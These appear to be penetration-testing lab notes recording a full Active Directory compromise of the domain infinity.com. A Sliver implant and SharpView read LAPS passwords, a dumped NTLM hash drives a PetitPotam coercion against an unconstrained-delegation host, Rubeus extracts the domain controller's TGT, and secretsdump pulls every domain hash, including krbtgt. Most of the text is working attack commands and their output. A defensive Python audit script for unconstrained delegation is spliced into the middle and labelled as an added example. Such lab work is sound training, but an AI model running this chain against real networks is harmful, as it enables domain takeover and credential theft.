sliver (COLOURFUL_HEADLINE) > sharpview Get-DomainObject -Identity web05 -Properties "ms-mcs-AdmPwd",name
[*] sharpview output:
[Get-DomainSearcher] search base: LDAP://DC03.INFINITY.COM/DC=INFINITY,DC=COM
[Get-DomainObject] Get-DomainComputer filter string: (&(|(|(samAccountName=web05)(name=web05)(displayname=web05))))
name : WEB05
ms-mcs-admpwd : 7-dveLtQYN3-R9
sliver (COLOURFUL_HEADLINE) > sharpview Get-DomainObject -Identity client -Properties "ms-mcs-AdmPwd",name
[*] sharpview output:
[Get-DomainSearcher] search base: LDAP://DC03.INFINITY.COM/DC=INFINITY,DC=COM
[Get-DomainObject] Get-DomainComputer filter string: (&(|(|(samAccountName=client)(name=client)(displayname=client))))
name : CLIENT
ms-mcs-admpwd : 0d)-9pso[qdEDQ
msv :
 [00000003] Primary
 * Username : ted
 * Domain   : INFINITY
 * NTLM     : e929e69f7c290222be87968263a9282e
 * SHA1     : 3f7364074ccaecba65146ef560e88211ec18cc16
 * DPAPI    : dcc46fe5434b57a72a6c1e850e3c221f
RDP in to web05, which has unconstrained delegation.
└─$ python3 PetitPotam.py -u ted -hashes e929e69f7c290222be87968263a9282e:e929e69f7c290222be87968263a9282e -d infinity.com -dc-ip 192.168.209.120 -target-ip 192.168.209.120 listener 192.168.209.121
___ _ _ _ ___ _
| _ \ ___ | |_ (_) | |_ | _ \ ___ | |_ __ _ _ __
| _/ / -_) | _| | | | _| | _/ / _ \ | _| / _` | | ' \
_|_|_ \___| _\__| _|_|_ _\__| _|_|_ \___/ _\__| \__,_| |_|_|_|
_| """ |_|"""""|_|"""""|_|"""""|_|"""""|_| """ |_|"""""|_|"""""|_|"""""|_|"""""|
"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'
PoC to elicit machine account authentication via some MS-EFSRPC functions
by topotam (@topotam77)
Inspired by @tifkin_ & @elad_shamir previous work on MS-RPRN
Trying pipe lsarpc
[-] Connecting to ncacn_np:192.168.209.121[\PIPE\lsarpc]
[+] Connected!
[+] Binding to c681d488-d850-11d0-8c52-00c04fd90f7e
[+] Successfully bound!
[-] Sending EfsRpcOpenFileRaw!
[+] Got expected ERROR_BAD_NETPATH exception!!
[+] Attack worked!
Unconstrained Delegation
Find unconstrained delegation
MATCH (c1:Computer)-[:MemberOf*1..]->(g:Group) WHERE g.objectid ENDS WITH '-516' WITH COLLECT(c1.name) AS domainControllers MATCH (c2 {unconstraineddelegation:true}) WHERE NOT c2.name IN domainControllers RETURN c2
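The Cypher query above needs a BloodHound database; the same audit can be run over a plain LDAP export. The following is an added example (not from the original notes, not BloodHound code) that reproduces the query's logic in Python on constructed records: it flags every computer with the TRUSTED_FOR_DELEGATION bit set in userAccountControl and drops those that are (directly or through nested groups) members of the group whose SID ends in -516. The group/computer dicts, names and SIDs are constructed for the lab domain in the notes.

```python
# Added example: audit for unconstrained delegation without BloodHound.
# Records are assumed to be dicts with the attributes used below (as from an
# ldapsearch/CSV export); all sample data here is constructed.

TRUSTED_FOR_DELEGATION = 0x80000   # userAccountControl bit = unconstrained delegation
DOMAIN_CONTROLLERS_RID = "-516"    # well-known RID suffix of "Domain Controllers"

# Constructed sample data modelled on the lab domain (infinity.com). A nested
# group is included to show the MemberOf*1.. expansion the Cypher query does.
SAMPLE_GROUPS = [
    {"name": "DOMAIN CONTROLLERS@INFINITY.COM", "objectSid": "S-1-5-21-111-222-333-516",
     "member": ["DC03.INFINITY.COM", "NESTED DCS@INFINITY.COM"]},
    {"name": "NESTED DCS@INFINITY.COM", "objectSid": "S-1-5-21-111-222-333-1201",
     "member": ["DC04.INFINITY.COM"]},
    {"name": "WEB SERVERS@INFINITY.COM", "objectSid": "S-1-5-21-111-222-333-1200",
     "member": ["WEB05.INFINITY.COM"]},
]
SAMPLE_COMPUTERS = [
    {"name": "DC03.INFINITY.COM",   "userAccountControl": 0x82000},  # SERVER_TRUST | TRUSTED_FOR_DELEGATION
    {"name": "DC04.INFINITY.COM",   "userAccountControl": 0x82000},  # DC reached via nested group
    {"name": "WEB05.INFINITY.COM",  "userAccountControl": 0x81000},  # WORKSTATION_TRUST | TRUSTED_FOR_DELEGATION
    {"name": "CLIENT.INFINITY.COM", "userAccountControl": 0x1000},   # WORKSTATION_TRUST only
]

def domain_controller_names(groups):
    """Every non-group member of a group whose SID ends in -516, expanding nested groups."""
    by_name = {g["name"]: g for g in groups}
    queue = [g for g in groups if g["objectSid"].endswith(DOMAIN_CONTROLLERS_RID)]
    seen, dcs = set(), set()
    while queue:
        g = queue.pop()
        if g["name"] in seen:
            continue                     # guard against circular nesting
        seen.add(g["name"])
        for m in g["member"]:
            if m in by_name:
                queue.append(by_name[m])  # nested group: expand it
            else:
                dcs.add(m)
    return dcs

def has_unconstrained_delegation(uac):
    return bool(uac & TRUSTED_FOR_DELEGATION)

def find_risky_unconstrained_hosts(computers, groups):
    """Hosts with unconstrained delegation that are not DCs. DCs legitimately carry
    the flag; any other such host caches TGTs of everything that authenticates to it."""
    dcs = domain_controller_names(groups)
    return sorted(c["name"] for c in computers
                  if has_unconstrained_delegation(c["userAccountControl"]) and c["name"] not in dcs)

if __name__ == "__main__":
    print(find_risky_unconstrained_hosts(SAMPLE_COMPUTERS, SAMPLE_GROUPS))  # ['WEB05.INFINITY.COM']
```

On a real export, feed the same dict shape from an ldapsearch of the computer and group objects; the only attributes needed are name, objectSid, member and userAccountControl.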
C:\Users\ted\Desktop>PetitPotam.exe dc03 web05
PetitPotam.exe dc03 web05
Usage: PetitPotam.exe <captureServerIP> <targetServerIP> <EFS-API-to-use>
Valid EFS APIs are:
1: EfsRpcOpenFileRaw (fixed with CVE-2021-36942)
2: EfsRpcEncryptFileSrv
3: EfsRpcDecryptFileSrv
4: EfsRpcQueryUsersOnFile
5: EfsRpcQueryRecoveryAgents
6: EfsRpcRemoveUsersFromFile
6: EfsRpcAddUsersToFile
C:\Users\ted\Desktop>PetitPotam.exe web05 dc03 1
PetitPotam.exe web05 dc03 1
Attack success!!!
C:\Users\ted\Desktop>
Invoke-Rubeus -Command 'dump /user:DC03$ /service:krbtgt /nowrap'
PS C:\Windows\system32> whoami
whoami
nt authority\system
PS C:\Windows\system32>
┌──(jay㉿localhost)-[~]
└─$ cd osep
┌──(jay㉿localhost)-[~/osep]
└─$ vim tgt.b64
┌──(jay㉿localhost)-[~/osep]
└─$ cat tgt.b64|base64 -d > ticket.kirbi
┌──(jay㉿localhost)-[~/osep]
└─$ ticketConverter.py ticket.kirbi ticket.ccache
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] converting kirbi to ccache...
[+] done
┌──(jay㉿localhost)-[~/osep]
└─$ export KRB5CCNAME=ticket.ccache
└─$ secretsdump.py -k -no-pass 'infinity.com/DC03$@DC03'
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[-] Policy SPN target name validation might be restricting full DRSUAPI dump. Try -just-dc-user
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:5f9163ca3b673adfff2828f368ca3760:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:120f9d6c433ec5b065fee44cf0f89354:::
infinity.com\ella:1105:aad3b435b51404eeaad3b435b51404ee:441e1d56843d467d3913ed44e53a84f5:::
infinity.com\ted:1106:aad3b435b51404eeaad3b435b51404ee:e929e69f7c290222be87968263a9282e:::
infinity.com\pete:1107:aad3b435b51404eeaad3b435b51404ee:00f50c4047ef95b6349492e3eb0a1b41:::
DC03$:1000:aad3b435b51404eeaad3b435b51404ee:48ad3603255044ebf62ab5db339cd36b:::
WEB05$:1103:aad3b435b51404eeaad3b435b51404ee:28c986e6a7946505220c62b2b8d9473e:::
CLIENT$:1104:aad3b435b51404eeaad3b435b51404ee:0c5fd2f6d1ee37bf09947d4db799270f:::
[*] Kerberos keys grabbed
[*] Cleaning up...